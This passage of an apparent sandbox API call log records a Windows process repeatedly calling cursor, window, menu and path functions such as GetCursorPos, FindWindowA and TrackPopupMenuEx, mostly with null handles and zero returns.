param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.431] GetStockObject (i=6) returned 0x1b00018 [0027.432] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.432] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.432] PathFileExistsW (pszPath=0x0) returned 0 [0027.432] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.432] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.432] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.432] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.432] GetMenu (hWnd=0x0) returned 0x0 [0027.432] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2d3) returned -1 [0027.432] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.432] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.432] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.432] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.432] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.432] GetStockObject (i=6) returned 0x1b00018 [0027.432] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.432] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.432] PathFileExistsW (pszPath=0x0) returned 0 [0027.432] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.432] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.432] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.432] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.432] GetMenu (hWnd=0x0) returned 0x0 [0027.432] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.432] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.432] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.432] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.432] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.432] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.432] GetStockObject (i=6) returned 0x1b00018 [0027.432] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.432] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.432] PathFileExistsW (pszPath=0x0) returned 0 [0027.432] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.433] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.433] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.433] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.433] GetMenu (hWnd=0x0) returned 0x0 [0027.433] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.433] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.433] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.433] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.433] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.433] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.433] GetStockObject (i=6) returned 0x1b00018 [0027.433] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.433] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.433] PathFileExistsW (pszPath=0x0) returned 0 [0027.433] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.433] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.433] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.433] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.433] GetMenu (hWnd=0x0) returned 0x0 [0027.433] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.433] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.433] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.433] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.433] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.433] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.433] GetStockObject (i=6) returned 0x1b00018 [0027.433] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.434] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.434] PathFileExistsW (pszPath=0x0) returned 0 [0027.434] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.434] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.434] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.434] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.434] GetMenu (hWnd=0x0) returned 0x0 [0027.434] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.434] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.434] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.434] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.434] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.434] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.434] GetStockObject (i=6) returned 0x1b00018 [0027.434] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.434] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.434] PathFileExistsW (pszPath=0x0) returned 0 [0027.434] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.434] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.434] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.434] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.434] GetMenu (hWnd=0x0) returned 0x0 [0027.434] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3aa) returned -1 [0027.434] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.434] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.434] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.435] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.435] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.435] GetStockObject (i=6) returned 0x1b00018 [0027.435] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.435] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.435] PathFileExistsW (pszPath=0x0) returned 0 [0027.435] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.435] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.435] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.435] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.435] GetMenu (hWnd=0x0) returned 0x0 [0027.435] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.435] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.435] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.435] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.435] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.435] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.435] GetStockObject (i=6) returned 0x1b00018 [0027.435] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.435] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.435] PathFileExistsW (pszPath=0x0) returned 0 [0027.435] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.435] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.435] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.435] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.435] GetMenu (hWnd=0x0) returned 0x0 [0027.435] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.435] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.435] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.435] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.435] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.435] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.436] GetStockObject (i=6) returned 0x1b00018 [0027.436] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.436] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.436] PathFileExistsW (pszPath=0x0) returned 0 [0027.436] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.436] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.436] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.436] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.436] GetMenu (hWnd=0x0) returned 0x0 [0027.436] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.436] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.436] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.436] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.436] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.436] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.436] GetStockObject (i=6) returned 0x1b00018 [0027.436] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.436] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.436] PathFileExistsW (pszPath=0x0) returned 0 [0027.436] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.436] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.436] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.436] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.436] GetMenu (hWnd=0x0) returned 0x0 [0027.436] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.436] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.436] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.436] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.436] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.436] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.436] GetStockObject (i=6) returned 0x1b00018 [0027.436] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.436] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.436] PathFileExistsW (pszPath=0x0) returned 0 [0027.437] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.437] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.437] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.437] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.437] GetMenu (hWnd=0x0) returned 0x0 [0027.437] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x514) returned -1 [0027.437] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.437] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.437] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.437] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.437] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.437] GetStockObject (i=6) returned 0x1b00018 [0027.437] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.437] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.437] PathFileExistsW (pszPath=0x0) returned 0 [0027.437] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.437] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.437] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.437] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.437] GetMenu (hWnd=0x0) returned 0x0 [0027.437] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.437] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.437] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.437] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.437] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.437] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.437] GetStockObject (i=6) returned 0x1b00018 [0027.437] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.437] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.437] PathFileExistsW (pszPath=0x0) returned 0 [0027.437] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.437] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.437] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.438] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.438] GetMenu (hWnd=0x0) returned 0x0 [0027.438] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.438] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.438] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.438] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.438] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.438] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.438] GetStockObject (i=6) returned 0x1b00018 [0027.438] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.438] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.438] PathFileExistsW (pszPath=0x0) returned 0 [0027.438] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.438] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.438] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.438] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.438] GetMenu (hWnd=0x0) returned 0x0 [0027.438] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.438] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.438] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.438] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.438] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.438] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.438] GetStockObject (i=6) returned 0x1b00018 [0027.438] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.438] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.438] PathFileExistsW (pszPath=0x0) returned 0 [0027.438] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.438] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.438] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.438] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.438] GetMenu (hWnd=0x0) returned 0x0 [0027.438] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.438] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.439] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.439] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.439] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.439] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.439] GetStockObject (i=6) returned 0x1b00018 [0027.439] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.439] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.439] PathFileExistsW (pszPath=0x0) returned 0 [0027.439] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.439] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.439] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.439] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.439] GetMenu (hWnd=0x0) returned 0x0 [0027.439] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x559) returned -1 [0027.439] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.439] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.439] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.439] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.439] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.439] GetStockObject (i=6) returned 0x1b00018 [0027.439] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.439] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.439] PathFileExistsW (pszPath=0x0) returned 0 [0027.439] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.439] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.439] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.439] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.439] GetMenu (hWnd=0x0) returned 0x0 [0027.439] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.439] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.439] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.439] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.439] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.440] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.440] GetStockObject (i=6) returned 0x1b00018 [0027.440] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.440] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.440] PathFileExistsW (pszPath=0x0) returned 0 [0027.440] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.440] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.440] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.440] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.440] GetMenu (hWnd=0x0) returned 0x0 [0027.440] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.440] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.440] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.440] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.440] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.440] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.440] GetStockObject (i=6) returned 0x1b00018 [0027.440] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.440] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.440] PathFileExistsW (pszPath=0x0) returned 0 [0027.440] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.440] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.440] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.440] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.440] GetMenu (hWnd=0x0) returned 0x0 [0027.440] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.440] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.440] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.440] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.440] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.440] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.440] GetStockObject (i=6) returned 0x1b00018 [0027.441] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.441] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.441] PathFileExistsW (pszPath=0x0) returned 0 [0027.441] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.441] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.441] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.441] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.441] GetMenu (hWnd=0x0) returned 0x0 [0027.441] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.441] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.441] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 